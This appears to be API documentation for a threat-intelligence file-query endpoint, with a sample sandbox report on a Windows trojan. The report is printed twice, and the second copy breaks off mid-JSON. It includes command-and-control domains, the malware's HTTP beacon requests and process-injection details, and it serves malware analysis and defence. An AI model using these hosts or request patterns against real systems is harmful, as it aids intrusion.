File Intelligence (V2)
curl --request POST \
--url https://api.threatbook.io/v2/file/query{
"response_code": 200,
"msg": "Success",
"multiengines": {
"result": {
"IKARUS": "safe",
"vbwebshell": "safe",
"Avast": "Win32:Fareit-CW",
"Avira": "Worm/Gamarue.ioemn",
"Sophos": "safe",
"K7": "EmailWorm ( 0040f1211 )",
"Rising": "safe",
"Kaspersky": "Trojan-Ransom.Win32.PornoAsset.cpbb",
"Panda": "Trj/Genetic.gen",
"Baidu-China": "Win32.Trojan.WisdomEyes.151026.9950.9999",
"NANO": "safe",
"Antiy": "Trojan[Downloader]/Win32.Wauchos",
"AVG": "Win32:Fareit-CW",
"Baidu": "safe",
"DrWeb": "safe",
"GDATA": "Gen:Variant.Sirefef.2107",
"Microsoft": "TrojanDropper:Win32/Gamarue.C",
"Qihu360": "Win32/Botnet.Andromeda.HxQBeV0A",
"ESET": "safe",
"ClamAV": "safe",
"JiangMin": "Trojan/PornoAsset.plh",
"Trustlook": "safe",
"MicroAPT": "safe",
"OneAV": "safe",
"OneStatic": "safe",
"MicroNonPE": "safe",
"OneAV-PWSH": "safe",
"ShellPub": "safe"
},
"scan_time": "2025-10-15 07:37:59",
"detect_rate": "12/28"
},
"summary": {
"sha1": "9156eaa5ed26bc220aaac3baf56241c48e7e03c1",
"md5": "b102cd8c3a882636a4ec337a9344a3a6",
"scenes": [],
"tag": {
"s": [
"exe",
"lang_english"
],
"x": [
"Trojan",
"PornoAsset"
]
},
"file_size": 64000,
"is_whitelist": false,
"malware_type": "Trojan",
"malware_family": "PornoAsset",
"sandbox_type_list": [
"win10_1903_enx64_office2016"
],
"threat_level": "malicious",
"submit_time": "2025-08-24 15:00:58",
"last_detection_time": "2025-10-15 15:37:59",
"file_name": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"file_type": "EXEx86",
"sample_sha256": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"threat_score": 90,
"sandbox_type": "win10_1903_enx64_office2016",
"multi_engines": "12/28"
},
"signature": [
{
"severity": 1,
"gray": false,
"references": [],
"sig_class": "Network Related",
"name": "network_http",
"description": "{\"en\": \"Performs some HTTP requests\", \"cn\": \"样本发起了HTTP请求\"}",
"markcount": 5,
"marks": [
{
"type": "generic",
"generic": {
"host": "anam0rph.su",
"request": "POST /in.php HTTP/1.1\r\nHost: anam0rph.su\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"uri": "/in.php"
}
},
{
"type": "generic",
"generic": {
"host": "bdcrqgonzmwuehky.nl",
"request": "POST /in.php HTTP/1.1\r\nHost: bdcrqgonzmwuehky.nl\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"uri": "/in.php"
}
},
{
"type": "generic",
"generic": {
"host": "somicrososoft.ru",
"request": "POST /in.php HTTP/1.1\r\nHost: somicrososoft.ru\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"uri": "/in.php"
}
}
],
"families": [],
"attck_id": "",
"attck_info": {}
},
{
"severity": 1,
"gray": false,
"references": [],
"sig_class": "Environment Awareness",
"name": "read_active_computer_name",
"description": "{\"en\": \"Reads the active computer name\", \"cn\": \"读取计算机名称\"}",
"markcount": 1,
"marks": [
{
"type": "ioc",
"ioc": {
"pid": [
6968
],
"category": "registry",
"ioc": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ComputerName\\ActiveComputerName\\ComputerName"
}
}
],
"families": [],
"attck_id": "T1087",
"attck_info": {
"Contributors": "Travis Smith, Tripwire",
"title": "Account Discovery",
"Permissions Required": "User",
"Platform": "Linux, macOS, Windows",
"Data Sources": "API monitoring, Process command-line parameters, Process monitoring",
"Tactic": "Discovery",
"CAPEC ID": "CAPEC-575",
"ID": "T1087"
}
},
{
"severity": 3,
"gray": false,
"references": [],
"sig_class": "Malware behavior",
"name": "suspicious_pe_in_memory",
"description": "{\"en\": \"Detected PE file in memory\", \"cn\": \"在内存中检测到PE文件\"}",
"markcount": 3,
"marks": [
{
"type": "generic",
"generic": {
"virtual_address": "0x3970000",
"size": 64512,
"memory_type": "PE",
"pid": 5612,
"process_path": "C:\\Users\\Administrator\\Desktop\\6feb4d.exe"
}
},
{
"type": "generic",
"generic": {
"virtual_address": "0x3ae0000",
"size": 1688,
"memory_type": "shellcode",
"pid": 5612,
"process_path": "C:\\Users\\Administrator\\Desktop\\6feb4d.exe"
}
},
{
"type": "generic",
"generic": {
"virtual_address": "0x6c70000",
"size": 14710,
"memory_type": "shellcode",
"pid": 6968,
"process_path": "C:\\Windows\\SysWOW64\\svchost.exe"
}
}
],
"families": [],
"attck_id": "",
"attck_info": {}
}
],
"static": {
"details": {
"pe_version_info": [],
"pe_sections": [
{
"name": ".text",
"virtual_address": "0x00001000",
"virtual_size": "0x0000518e",
"size_of_data": "0x00005200",
"pointer_to_rawdata": "0x00000400",
"hash": "e6f69cb384e70bf825dcbeb133e0dbbc",
"SectionPermission": "R-E",
"entropy": 6.892130502363175
},
{
"name": ".reloc",
"virtual_address": "0x00014000",
"virtual_size": "0x00001da5",
"size_of_data": "0x00001e00",
"pointer_to_rawdata": "0x0000dc00",
"hash": "3c89baa0cc859837bb9ac8917b6058d7",
"SectionPermission": "RW-",
"entropy": 6.966489345591115
}
],
"pe_signatures": {
"product": "n/a",
"verified": "Unsigned",
"description": "n/a"
},
"pe_imports": [
{
"dll": "SHLWAPI.dll",
"imports": [
{
"address": "0x40e000",
"name": "PathIsURLW"
},
{
"address": "0x40e004",
"name": "PathGetDriveNumberA"
},
{
"address": "0x40e008",
"name": "PathIsRelativeA"
}
]
},
{
"dll": "KERNEL32.dll",
"imports": [
{
"address": "0x40e020",
"name": "lstrcpyW"
}
]
}
],
"pe_resources": [
{
"name": "RT_ICON",
"offset": "0x00013160",
"size": "0x00000128",
"filetype": "GLS_BINARY_LSB_FIRST",
"language": "LANG_ENGLISH",
"sublanguage": "SUBLANG_ENGLISH_US"
},
{
"name": "RT_GROUP_ICON",
"offset": "0x00013728",
"size": "0x00000092",
"filetype": "data",
"language": "LANG_ENGLISH",
"sublanguage": "SUBLANG_ENGLISH_US"
}
],
"tag": [],
"pe_basic": {
"tls_info": {},
"import_hash": "540cba6657a101cb43bb9f60920f4768",
"peid": [
"filetype: PE32",
"arch: I386",
"mode: 32",
"endianess: LE",
"type: GUI",
"compiler: Microsoft Visual C/C++(2008 SP1)[-]",
"linker: Microsoft Linker(9.0)[GUI32]"
],
"time_stamp": "2012-10-09 09:11:58",
"entry_point_section": ".text",
"image_base": "0x400000",
"entry_point": "0x4505"
},
"pe_detect": {
"find_crypt": {},
"urls": []
},
"pe_exports": [
{
"address": "0x401b28",
"name": "FirstMagnitudE",
"ordinal": 1
},
{
"address": "0x40446f",
"name": "?SecondMagni@@YGEUCOMMANDLINE094@@WE",
"ordinal": 2
}
]
},
"basic": {
"sha1": "9156eaa5ed26bc220aaac3baf56241c48e7e03c1",
"sha256": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"file_type": "PE32 executable (GUI) Intel 80386, for MS Windows",
"file_name": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"ssdeep": "768:8ZYOGJ8z39m6odrD2ydQtaCGvRDvqguFjI3LOLisuIPcH9e3FEx8EFK4AVSi0WC4:83t2dGanvsh2ki4PQeVEKE38TCNMBMpw",
"file_size": 64000,
"md5": "b102cd8c3a882636a4ec337a9344a3a6"
}
},
"pstree": {
"children": [
{
"pid": 5612,
"ppid": 3832,
"process_name": "6feb4d.exe",
"command_line": "\"C:\\Users\\Administrator\\Desktop\\6feb4d.exe\" ",
"argument_vector": [
"C:\\Users\\Administrator\\Desktop\\6feb4d.exe"
],
"first_seen": 1756047699918.287,
"children": [
{
"pid": 6968,
"ppid": 5612,
"process_name": "svchost.exe",
"command_line": "C:\\Windows\\syswow64\\svchost.exe",
"argument_vector": [
"C:\\Windows\\syswow64\\svchost.exe"
],
"first_seen": 1756047703968.084,
"children": [],
"track": true
}
],
"track": true
}
],
"process_name": {
"en": "Analysed 2 processes in total",
"cn": "共分析了2个进程"
}
},
"network": {
"mitm": [],
"tcp": [
{
"src": "100.64.8.14",
"sport": 49723,
"dst": "50.16.27.236",
"dport": 80,
"offset": 144133,
"time": 19.677597045898438,
"ppid": 5612,
"pid": 6968,
"process_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"process_name": "svchost.exe"
},
{
"src": "100.64.8.14",
"sport": 49726,
"dst": "176.58.104.168",
"dport": 80,
"offset": 153964,
"time": 21.888036012649536,
"ppid": 5612,
"pid": 6968,
"process_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"process_name": "svchost.exe"
}
],
"udp": [],
"icmp": [],
"http": [
{
"count": 3,
"host": "anam0rph.su",
"port": 80,
"data": "POST /in.php HTTP/1.1\r\nHost: anam0rph.su\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close\r\n\r\n",
"uri": "/in.php",
"body": "",
"path": "/in.php",
"url": "http://anam0rph.su/in.php",
"user-agent": "Mozilla/4.0",
"version": "1.1",
"method": "POST"
},
{
"count": 3,
"host": "somicrososoft.ru",
"port": 80,
"data": "POST /in.php HTTP/1.1\r\nHost: somicrososoft.ru\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close\r\n\r\n",
"uri": "/in.php",
"body": "",
"path": "/in.php",
"url": "http://somicrososoft.ru/in.php",
"user-agent": "Mozilla/4.0",
"version": "1.1",
"method": "POST"
}
],
"tls": [],
"dns": [
{
"request": "somicrososoft.ru",
"type": "A",
"answers": [
{
"type": "A",
"data": "3.229.117.57",
"time": 22.89440417289734
},
{
"type": "A",
"data": "3.229.117.57",
"time": 43.141231060028076
},
{
"type": "A",
"data": "3.229.117.57",
"time": 62.58969497680664
}
],
"time": 22.542392015457153
}
],
"smtp": [],
"irc": [],
"irc_ex": [],
"dns_servers": [
"223.5.5.5",
"8.8.4.4"
],
"fingerprint": [],
"tcp_ex": [
{
"src": "100.64.8.14",
"dst": "50.16.27.236",
"sport": 49723,
"dport": 80,
"proto": 6,
"time": 19.677597045898438,
"tcp_detail": [
{
"time": 19.677597045898438,
"type": "request",
"size": 241,
"sha256": "fe7525bf77fe49345f26413e8ba8824834beae6d5984ece4f4c581a3df99bf74"
},
{
"time": 19.677597045898438,
"type": "response",
"size": 149,
"sha256": "ea4600ec90525266d9f4458351d0c971ccda17162400a7765c8293700c829a15"
}
],
"proc_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"proc_name": "svchost.exe",
"pid": 6968
},
{
"src": "100.64.8.14",
"dst": "3.229.117.57",
"sport": 49742,
"dport": 80,
"proto": 6,
"time": 62.59141516685486,
"tcp_detail": [
{
"time": 62.59141516685486,
"type": "request",
"size": 246,
"sha256": "e2bfffd5c77cd0f552d6969942a18676874e55774da0c94f9461c37e921d1826"
},
{
"time": 62.59141516685486,
"type": "response",
"size": 149,
"sha256": "45ca865eba2b31cd28ca8bfe44fa6c4a16f25bd92e520a1761701a75270c34ac"
}
],
"proc_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"proc_name": "svchost.exe",
"pid": 6968
}
],
"smtp_ex": [],
"http_ex": [
{
"time": 23.122490167617798,
"src": "100.64.8.14",
"sport": 49727,
"dst": "3.229.117.57",
"dport": 80,
"protocol": "http",
"method": "POST",
"host": "somicrososoft.ru",
"uri": "/in.php",
"url": "http://somicrososoft.ru/in.php",
"status": 200,
"request": "POST /in.php HTTP/1.1\r\nHost: somicrososoft.ru\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"response": "HTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Sun, 24 Aug 2025 15:01:49 GMT\r\nContent-Type: application/octet-stream\r\nContent-Length: 0\r\nConnection: close",
"req": {
"file_info": {
"name": "33f91bbc0b502f8daab951737c8088a190422a211fe1ae4c0481c96618e5b862",
"size": 84,
"crc32": "84E1BCE3",
"md5": "2fad74b4750ec31092830231e76a6c3f",
"sha1": "d4a2a32ed81842f4a392cb3c5b430e4ce2c4820f",
"sha256": "33f91bbc0b502f8daab951737c8088a190422a211fe1ae4c0481c96618e5b862",
"sha512": "c797da42edae157cc27c6d274023a17cd23ffc139705e97f06a3cae6cd74f9b61aa23de2bbc5c985dfea610c787f3e70d4f594f3f8b19a3b3a9dd8b60df50ffd",
"ssdeep": "3:AfNmSUjGVLUooLWvU7jURTK9k8OQoC50rY:AfNmSUjAwxKvu8M1OQogZ",
"type": "ASCII text, with no line terminators",
"yara": [],
"domains": [],
"ips": [],
"urls": [],
"mails": []
},
"trid_info": [],
"md5": "2fad74b4750ec31092830231e76a6c3f",
"sha1": "d4a2a32ed81842f4a392cb3c5b430e4ce2c4820f",
"sha256": "33f91bbc0b502f8daab951737c8088a190422a211fe1ae4c0481c96618e5b862"
},
"resp": {
"file_info": {
"name": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"size": 0,
"crc32": "00000000",
"md5": "d41d8cd98f00b204e9800998ecf8427e",
"sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"sha512": "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e",
"ssdeep": "3::",
"type": "empty",
"yara": [],
"domains": [],
"ips": [],
"urls": [],
"mails": []
},
"trid_info": [],
"md5": "d41d8cd98f00b204e9800998ecf8427e",
"sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
},
"md5": "d41d8cd98f00b204e9800998ecf8427e",
"sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"pid": 6968,
"process_name": "svchost.exe"
}
],
"https_ex": [],
"dead_hosts": [],
"domains": [
{
"domain": "bdcrqgonzmwuehky.nl",
"ip": "176.58.104.168"
},
{
"domain": "somicrososoft.ru",
"ip": "3.229.117.57"
}
],
"hosts": [
"3.229.117.57",
"176.58.104.168"
]
},
"dropped": [
{
"sha1": "9156eaa5ed26bc220aaac3baf56241c48e7e03c1",
"threat_level": "malicious",
"urls": [],
"sha256": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"size": 64000,
"filepath": "C:\\ProgramData\\Local Settings\\Temp\\msajyt.cmd",
"name": "msajyt.cmd",
"crc32": "49F50535",
"ssdeep": "768:8ZYOGJ8z39m6odrD2ydQtaCGvRDvqguFjI3LOLisuIPcH9e3FEx8EFK4AVSi0WC4:83t2dGanvsh2ki4PQeVEKE38TCNMBMpw",
"type": "PE32 executable (GUI) Intel 80386, for MS Windows",
"yara": [],
"md5": "b102cd8c3a882636a4ec337a9344a3a6"
}
],
"strings": {
"5612_88165644311524082025": [
";x\\&:}V*",
"hdll.hsbie",
"kernel32.dll",
".]a[<HI",
"hsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsyst",
"h.dllhpi32hadva",
"!This program cannot be run in DOS mode."
],
"5612_51029104311524082025": [
"ntdll.dll",
"lstrcatW",
"CloseHandle",
"\\syswow64\\svchost.exe",
"\\system32\\wuauclt.exe",
"VirtualFree",
"NtDelayExecution",
"ZwUnmapViewOfSection",
"ZwQueryInformationProcess"
],
"pcap": [
"DESKTOP-H9URB7T ",
"bigcatalog",
"MSFT 5.0",
"Date: Sun, 24 Aug 2025 15:02:07 GMT",
"edgekey",
" EEEFFDELFEEPFACNEIDJFFFCECDHFECA",
"!http://oneocsp.microsoft.com/ocsp0",
"sidnlabs"
]
}
}Enrichment
File Intelligence
Retrieve detailed static and dynamic analysis reports of a file, including file summary information, network behavior, behavioral signatures, static information, dropped behavior, process behavior, and multi-engines detection results.
POST
/
v2
/
file
/
query
File Intelligence (V2)
curl --request POST \
--url https://api.threatbook.io/v2/file/query{
"response_code": 200,
"msg": "Success",
"multiengines": {
"result": {
"IKARUS": "safe",
"vbwebshell": "safe",
"Avast": "Win32:Fareit-CW",
"Avira": "Worm/Gamarue.ioemn",
"Sophos": "safe",
"K7": "EmailWorm ( 0040f1211 )",
"Rising": "safe",
"Kaspersky": "Trojan-Ransom.Win32.PornoAsset.cpbb",
"Panda": "Trj/Genetic.gen",
"Baidu-China": "Win32.Trojan.WisdomEyes.151026.9950.9999",
"NANO": "safe",
"Antiy": "Trojan[Downloader]/Win32.Wauchos",
"AVG": "Win32:Fareit-CW",
"Baidu": "safe",
"DrWeb": "safe",
"GDATA": "Gen:Variant.Sirefef.2107",
"Microsoft": "TrojanDropper:Win32/Gamarue.C",
"Qihu360": "Win32/Botnet.Andromeda.HxQBeV0A",
"ESET": "safe",
"ClamAV": "safe",
"JiangMin": "Trojan/PornoAsset.plh",
"Trustlook": "safe",
"MicroAPT": "safe",
"OneAV": "safe",
"OneStatic": "safe",
"MicroNonPE": "safe",
"OneAV-PWSH": "safe",
"ShellPub": "safe"
},
"scan_time": "2025-10-15 07:37:59",
"detect_rate": "12/28"
},
"summary": {
"sha1": "9156eaa5ed26bc220aaac3baf56241c48e7e03c1",
"md5": "b102cd8c3a882636a4ec337a9344a3a6",
"scenes": [],
"tag": {
"s": [
"exe",
"lang_english"
],
"x": [
"Trojan",
"PornoAsset"
]
},
"file_size": 64000,
"is_whitelist": false,
"malware_type": "Trojan",
"malware_family": "PornoAsset",
"sandbox_type_list": [
"win10_1903_enx64_office2016"
],
"threat_level": "malicious",
"submit_time": "2025-08-24 15:00:58",
"last_detection_time": "2025-10-15 15:37:59",
"file_name": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"file_type": "EXEx86",
"sample_sha256": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"threat_score": 90,
"sandbox_type": "win10_1903_enx64_office2016",
"multi_engines": "12/28"
},
"signature": [
{
"severity": 1,
"gray": false,
"references": [],
"sig_class": "Network Related",
"name": "network_http",
"description": "{\"en\": \"Performs some HTTP requests\", \"cn\": \"样本发起了HTTP请求\"}",
"markcount": 5,
"marks": [
{
"type": "generic",
"generic": {
"host": "anam0rph.su",
"request": "POST /in.php HTTP/1.1\r\nHost: anam0rph.su\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"uri": "/in.php"
}
},
{
"type": "generic",
"generic": {
"host": "bdcrqgonzmwuehky.nl",
"request": "POST /in.php HTTP/1.1\r\nHost: bdcrqgonzmwuehky.nl\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"uri": "/in.php"
}
},
{
"type": "generic",
"generic": {
"host": "somicrososoft.ru",
"request": "POST /in.php HTTP/1.1\r\nHost: somicrososoft.ru\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"uri": "/in.php"
}
}
],
"families": [],
"attck_id": "",
"attck_info": {}
},
{
"severity": 1,
"gray": false,
"references": [],
"sig_class": "Environment Awareness",
"name": "read_active_computer_name",
"description": "{\"en\": \"Reads the active computer name\", \"cn\": \"读取计算机名称\"}",
"markcount": 1,
"marks": [
{
"type": "ioc",
"ioc": {
"pid": [
6968
],
"category": "registry",
"ioc": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ComputerName\\ActiveComputerName\\ComputerName"
}
}
],
"families": [],
"attck_id": "T1087",
"attck_info": {
"Contributors": "Travis Smith, Tripwire",
"title": "Account Discovery",
"Permissions Required": "User",
"Platform": "Linux, macOS, Windows",
"Data Sources": "API monitoring, Process command-line parameters, Process monitoring",
"Tactic": "Discovery",
"CAPEC ID": "CAPEC-575",
"ID": "T1087"
}
},
{
"severity": 3,
"gray": false,
"references": [],
"sig_class": "Malware behavior",
"name": "suspicious_pe_in_memory",
"description": "{\"en\": \"Detected PE file in memory\", \"cn\": \"在内存中检测到PE文件\"}",
"markcount": 3,
"marks": [
{
"type": "generic",
"generic": {
"virtual_address": "0x3970000",
"size": 64512,
"memory_type": "PE",
"pid": 5612,
"process_path": "C:\\Users\\Administrator\\Desktop\\6feb4d.exe"
}
},
{
"type": "generic",
"generic": {
"virtual_address": "0x3ae0000",
"size": 1688,
"memory_type": "shellcode",
"pid": 5612,
"process_path": "C:\\Users\\Administrator\\Desktop\\6feb4d.exe"
}
},
{
"type": "generic",
"generic": {
"virtual_address": "0x6c70000",
"size": 14710,
"memory_type": "shellcode",
"pid": 6968,
"process_path": "C:\\Windows\\SysWOW64\\svchost.exe"
}
}
],
"families": [],
"attck_id": "",
"attck_info": {}
}
],
"static": {
"details": {
"pe_version_info": [],
"pe_sections": [
{
"name": ".text",
"virtual_address": "0x00001000",
"virtual_size": "0x0000518e",
"size_of_data": "0x00005200",
"pointer_to_rawdata": "0x00000400",
"hash": "e6f69cb384e70bf825dcbeb133e0dbbc",
"SectionPermission": "R-E",
"entropy": 6.892130502363175
},
{
"name": ".reloc",
"virtual_address": "0x00014000",
"virtual_size": "0x00001da5",
"size_of_data": "0x00001e00",
"pointer_to_rawdata": "0x0000dc00",
"hash": "3c89baa0cc859837bb9ac8917b6058d7",
"SectionPermission": "RW-",
"entropy": 6.966489345591115
}
],
"pe_signatures": {
"product": "n/a",
"verified": "Unsigned",
"description": "n/a"
},
"pe_imports": [
{
"dll": "SHLWAPI.dll",
"imports": [
{
"address": "0x40e000",
"name": "PathIsURLW"
},
{
"address": "0x40e004",
"name": "PathGetDriveNumberA"
},
{
"address": "0x40e008",
"name": "PathIsRelativeA"
}
]
},
{
"dll": "KERNEL32.dll",
"imports": [
{
"address": "0x40e020",
"name": "lstrcpyW"
}
]
}
],
"pe_resources": [
{
"name": "RT_ICON",
"offset": "0x00013160",
"size": "0x00000128",
"filetype": "GLS_BINARY_LSB_FIRST",
"language": "LANG_ENGLISH",
"sublanguage": "SUBLANG_ENGLISH_US"
},
{
"name": "RT_GROUP_ICON",
"offset": "0x00013728",
"size": "0x00000092",
"filetype": "data",
"language": "LANG_ENGLISH",
"sublanguage": "SUBLANG_ENGLISH_US"
}
],
"tag": [],
"pe_basic": {
"tls_info": {},
"import_hash": "540cba6657a101cb43bb9f60920f4768",
"peid": [
"filetype: PE32",
"arch: I386",
"mode: 32",
"endianess: LE",
"type: GUI",
"compiler: Microsoft Visual C/C++(2008 SP1)[-]",
"linker: Microsoft Linker(9.0)[GUI32]"
],
"time_stamp": "2012-10-09 09:11:58",
"entry_point_section": ".text",
"image_base": "0x400000",
"entry_point": "0x4505"
},
"pe_detect": {
"find_crypt": {},
"urls": []
},
"pe_exports": [
{
"address": "0x401b28",
"name": "FirstMagnitudE",
"ordinal": 1
},
{
"address": "0x40446f",
"name": "?SecondMagni@@YGEUCOMMANDLINE094@@WE",
"ordinal": 2
}
]
},
"basic": {
"sha1": "9156eaa5ed26bc220aaac3baf56241c48e7e03c1",
"sha256": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"file_type": "PE32 executable (GUI) Intel 80386, for MS Windows",
"file_name": "9145f476a9f1f3b793709276de9631dd406e4f240863bbf3d6c66bc3456feb4d",
"ssdeep": "768:8ZYOGJ8z39m6odrD2ydQtaCGvRDvqguFjI3LOLisuIPcH9e3FEx8EFK4AVSi0WC4:83t2dGanvsh2ki4PQeVEKE38TCNMBMpw",
"file_size": 64000,
"md5": "b102cd8c3a882636a4ec337a9344a3a6"
}
},
"pstree": {
"children": [
{
"pid": 5612,
"ppid": 3832,
"process_name": "6feb4d.exe",
"command_line": "\"C:\\Users\\Administrator\\Desktop\\6feb4d.exe\" ",
"argument_vector": [
"C:\\Users\\Administrator\\Desktop\\6feb4d.exe"
],
"first_seen": 1756047699918.287,
"children": [
{
"pid": 6968,
"ppid": 5612,
"process_name": "svchost.exe",
"command_line": "C:\\Windows\\syswow64\\svchost.exe",
"argument_vector": [
"C:\\Windows\\syswow64\\svchost.exe"
],
"first_seen": 1756047703968.084,
"children": [],
"track": true
}
],
"track": true
}
],
"process_name": {
"en": "Analysed 2 processes in total",
"cn": "共分析了2个进程"
}
},
"network": {
"mitm": [],
"tcp": [
{
"src": "100.64.8.14",
"sport": 49723,
"dst": "50.16.27.236",
"dport": 80,
"offset": 144133,
"time": 19.677597045898438,
"ppid": 5612,
"pid": 6968,
"process_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"process_name": "svchost.exe"
},
{
"src": "100.64.8.14",
"sport": 49726,
"dst": "176.58.104.168",
"dport": 80,
"offset": 153964,
"time": 21.888036012649536,
"ppid": 5612,
"pid": 6968,
"process_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"process_name": "svchost.exe"
}
],
"udp": [],
"icmp": [],
"http": [
{
"count": 3,
"host": "anam0rph.su",
"port": 80,
"data": "POST /in.php HTTP/1.1\r\nHost: anam0rph.su\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close\r\n\r\n",
"uri": "/in.php",
"body": "",
"path": "/in.php",
"url": "http://anam0rph.su/in.php",
"user-agent": "Mozilla/4.0",
"version": "1.1",
"method": "POST"
},
{
"count": 3,
"host": "somicrososoft.ru",
"port": 80,
"data": "POST /in.php HTTP/1.1\r\nHost: somicrososoft.ru\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close\r\n\r\n",
"uri": "/in.php",
"body": "",
"path": "/in.php",
"url": "http://somicrososoft.ru/in.php",
"user-agent": "Mozilla/4.0",
"version": "1.1",
"method": "POST"
}
],
"tls": [],
"dns": [
{
"request": "somicrososoft.ru",
"type": "A",
"answers": [
{
"type": "A",
"data": "3.229.117.57",
"time": 22.89440417289734
},
{
"type": "A",
"data": "3.229.117.57",
"time": 43.141231060028076
},
{
"type": "A",
"data": "3.229.117.57",
"time": 62.58969497680664
}
],
"time": 22.542392015457153
}
],
"smtp": [],
"irc": [],
"irc_ex": [],
"dns_servers": [
"223.5.5.5",
"8.8.4.4"
],
"fingerprint": [],
"tcp_ex": [
{
"src": "100.64.8.14",
"dst": "50.16.27.236",
"sport": 49723,
"dport": 80,
"proto": 6,
"time": 19.677597045898438,
"tcp_detail": [
{
"time": 19.677597045898438,
"type": "request",
"size": 241,
"sha256": "fe7525bf77fe49345f26413e8ba8824834beae6d5984ece4f4c581a3df99bf74"
},
{
"time": 19.677597045898438,
"type": "response",
"size": 149,
"sha256": "ea4600ec90525266d9f4458351d0c971ccda17162400a7765c8293700c829a15"
}
],
"proc_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"proc_name": "svchost.exe",
"pid": 6968
},
{
"src": "100.64.8.14",
"dst": "3.229.117.57",
"sport": 49742,
"dport": 80,
"proto": 6,
"time": 62.59141516685486,
"tcp_detail": [
{
"time": 62.59141516685486,
"type": "request",
"size": 246,
"sha256": "e2bfffd5c77cd0f552d6969942a18676874e55774da0c94f9461c37e921d1826"
},
{
"time": 62.59141516685486,
"type": "response",
"size": 149,
"sha256": "45ca865eba2b31cd28ca8bfe44fa6c4a16f25bd92e520a1761701a75270c34ac"
}
],
"proc_path": "C:\\Windows\\SysWOW64\\svchost.exe",
"proc_name": "svchost.exe",
"pid": 6968
}
],
"smtp_ex": [],
"http_ex": [
{
"time": 23.122490167617798,
"src": "100.64.8.14",
"sport": 49727,
"dst": "3.229.117.57",
"dport": 80,
"protocol": "http",
"method": "POST",
"host": "somicrososoft.ru",
"uri": "/in.php",
"url": "http://somicrososoft.ru/in.php",
"status": 200,
"request": "POST /in.php HTTP/1.1\r\nHost: somicrososoft.ru\r\nUser-Agent: Mozilla/4.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 84\r\nConnection: close",
"response": "HTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Sun, 24 Aug 2025 15:01:49 GMT\r\nContent-Type: application/octet-stream\r\nContent-Length: 0\r\nConnection: close",
"req": {
"file_info": {
"name": "33f91bbc0b502f8daab951737c8088a190422a211fe1ae4c0481c96618e5b862",
"size": 84,
"crc32": "84E1BCE3",
"md5": "2fad74b4750ec31092830231e76a6c3f",
"sha1": "d4a2a32ed81842f4a392cb3c5b430e4ce2c4820f",
"sha256": "33f91bbc0b502f8daab951737c8088a190422a211fe1ae4c0481c96618e5b862",
"sha512": "c797da42edae157cc27c6d274023a17cd23ffc139705e97f06a3cae6cd74f9b61aa23de2bbc5c985dfea610c787f3e70d4f594f3f8b19a3b3a9dd8b60df50ffd",
"ssdeep": "3:AfNmSUjGVLUooLWvU7jURTK9k8OQoC50rY:AfNmSUjAwxKvu8M1OQogZ",
"type": "ASCII text, with no line terminators",
"yara": [],
"domains": [],
"ips": [],
"urls": [],
"mails": []
},
"trid_info": [],
"md5": "2fad74b4750ec31092830231e76a6c3f",
"sha1": "d4a2a32ed81842f4a392cb3c5b430e4ce2c4820f",
"sha256": "33f91bbc0b502f8daab951737c8088a190422a211fe1ae4c0481c96618e5b862"
},
"resp": {
"file_info": {
